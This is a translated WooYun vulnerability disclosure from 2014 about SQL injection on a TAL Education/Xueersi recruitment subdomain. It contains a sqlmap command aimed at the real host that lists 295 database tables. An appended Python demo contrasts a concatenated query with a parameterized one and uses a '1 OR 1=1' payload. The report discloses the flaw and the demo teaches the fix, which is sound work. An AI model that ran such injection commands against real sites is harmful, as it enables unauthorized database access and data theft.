
Vulnerability summary

Defect ID: wooyun-2014-077548

Title: SQL injection vulnerability in a Xueersi business site

Vendor: TAL Education Group, Xueersi Peiyou (好未来集团学而思培优)

Author: 宝-宝

Submitted: 2014-09-27 17:50

Fixed: 2014-11-11 17:52

Published: 2014-11-11 17:52

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-09-27: Details sent to the vendor; awaiting vendor handling
2014-09-29: Vendor confirmed; details disclosed to the vendor only
2014-10-09: Details disclosed to core white hats and domain experts
2014-10-19: Details disclosed to regular white hats
2014-10-29: Details disclosed to intern white hats
2014-11-11: Details disclosed to the public

Brief description:

A subdomain does not filter its input, resulting in a SQL injection vulnerability through which the database can be dumped.

Detailed description:

sqlmap -u "http://job.100tal.com/?systemjobtype=1" -v 1 --tables -D "job.xueersi.org"
Current database: job.xueersi.org
----------------------------------------------------------------------
Database: job.xueersi.org
[295 tables]

Proof of vulnerability:

[Screenshot: 333.png]

[Screenshot: 123.png]


Fix recommendation:

You understand this better than I do... filter, filter.

Copyright notice: please credit the source when republishing: 宝-宝@乌云
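What "filter" should mean in practice, as an added example that is not part of the original report: a constructed in-memory SQLite stand-in (the `job` table and its rows are invented, not the real job.xueersi.org schema) in which the `systemjobtype` request parameter is spliced into the SQL text, beside the corrected lookup that type-checks the parameter and binds it instead of concatenating it.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the jobs table; rows are made up for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE job (id INTEGER, systemjobtype INTEGER, title TEXT)")
    conn.executemany(
        "INSERT INTO job VALUES (?, ?, ?)",
        [(1, 1, "Teacher"), (2, 1, "Tutor"), (3, 2, "Engineer")],
    )
    conn.commit()
    return conn


def jobs_vulnerable(conn, systemjobtype):
    """The pattern behind the report: the raw GET value becomes part of the SQL."""
    sql = "SELECT title FROM job WHERE systemjobtype = " + systemjobtype
    return [row[0] for row in conn.execute(sql)]


def jobs_fixed(conn, systemjobtype):
    """Corrected lookup: validate the parameter's type, then bind it."""
    # 1. systemjobtype is an integer id; anything else is rejected before
    #    it gets near the database.
    if not systemjobtype.isdigit():
        raise ValueError("systemjobtype must be a non-negative integer")
    # 2. The value is passed as a bound parameter, so the driver sends it
    #    as data; it can never be interpreted as SQL.
    sql = "SELECT title FROM job WHERE systemjobtype = ?"
    return [row[0] for row in conn.execute(sql, (int(systemjobtype),))]


if __name__ == "__main__":
    db = make_db()
    print("legit, vulnerable:", jobs_vulnerable(db, "1"))
    print("legit, fixed:     ", jobs_fixed(db, "1"))
    # A tautology appended to the id widens the vulnerable query to every row.
    print("tautology, vulnerable:", jobs_vulnerable(db, "1 OR 1=1"))
    try:
        jobs_fixed(db, "1 OR 1=1")
    except ValueError as exc:
        print("tautology, fixed: rejected:", exc)
```

The parameter binding alone already stops the injection; the type check in front of it turns the malformed request into a loggable validation failure, which is the signal a defender wants to alert on.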


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2014-09-29 10:16

Vendor reply:

Being fixed, thanks for your support

Latest status:

None yet

